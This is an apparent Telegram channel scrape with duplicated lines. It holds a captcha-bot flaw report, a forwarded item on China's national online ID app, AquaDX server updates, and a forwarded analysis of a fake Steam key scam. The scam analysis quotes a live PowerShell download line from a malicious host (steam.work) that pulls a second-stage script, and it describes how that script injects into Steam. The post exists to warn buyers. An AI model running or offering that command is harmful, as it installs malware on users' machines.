点了点群里不属于自己的验证码的错误选项,偶然发现三个错误选项同时显示了加载背景
复制出回调信息发现三个错误的回调是一样的,答案直接写在返回给用户的回调信息里
这对机器人来说就相当于网页上的验证码直接是文字你可以选中复制下来,机器人直接就知道怎么发送正确的验证信息
(当然我只看了这一个 bot,不代表所有 bot 都这样)
复制出回调信息发现三个错误的回调是一样的,答案直接写在返回给用户的回调信息里
这对机器人来说就相当于网页上的验证码直接是文字你可以选中复制下来,机器人直接就知道怎么发送正确的验证信息
(当然我只看了这一个 bot,不代表所有 bot 都这样)
Forwarded from 竹新社
中央网信办就《国家网络身份认证公共服务管理办法》征求意见,为期30日。
公安部建了“国家网络身份认证”App,可凭18位身份证(含港澳台外的居住证)、港澳回乡证、台湾大通证、中国护照(限定居国外者)使用。
用户可申领“网号”(一串字母数字,不含明文),App签发“网证”(承载网号和非明文身份信息的凭证)。
鼓励各互联网平台自愿改用该App登记核验用户的实名信息,以减少个人信息采集留存。民政、文旅、广电、卫健、铁路、邮政等部门,在各自范围内推广应用该App。
网站如根据国家实名制规定,只需核验真实身份,App只提供“网证”核验结果;如依规须留存证件,App经用户授权将提供最小化的明文信息。
(中央网信办)
公安部建了“国家网络身份认证”App,可凭18位身份证(含港澳台外的居住证)、港澳回乡证、台湾大通证、中国护照(限定居国外者)使用。
用户可申领“网号”(一串字母数字,不含明文),App签发“网证”(承载网号和非明文身份信息的凭证)。
鼓励各互联网平台自愿改用该App登记核验用户的实名信息,以减少个人信息采集留存。民政、文旅、广电、卫健、铁路、邮政等部门,在各自范围内推广应用该App。
网站如根据国家实名制规定,只需核验真实身份,App只提供“网证”核验结果;如依规须留存证件,App经用户授权将提供最小化的明文信息。
(中央网信办)
👍6👎3
给 AquaDX 适配了 145 的喜爱收藏品和喜欢的歌
亲密度和 maimile 还没做,毕竟现在还没有支持能获取 maimile 的渠道
亲密度和 maimile 还没做,毕竟现在还没有支持能获取 maimile 的渠道
❤7
https://github.com/hykilpikonna/AquaDX/commit/a71c2bd8ec29be59226af7c6de19227abccf6f70
AquaDX 现已支持导入 Aqua 导出的数据
AquaDX 现已支持导入 Aqua 导出的数据
🥰4
Forwarded from 橘橘橘子汁 & 🍊
# 关于 steam.work 激活码诈骗脚本的分析
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是
那么真实的代码就只剩一行了
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...
## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?
我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是
<!DOCTYPE html> 这鸟人给他改成 <#!DOCTYPE html> 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转,真是够阴损那么真实的代码就只剩一行了
irm steam.work/pwsDwFile/new1 -OutFile x.ps1
又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
👍7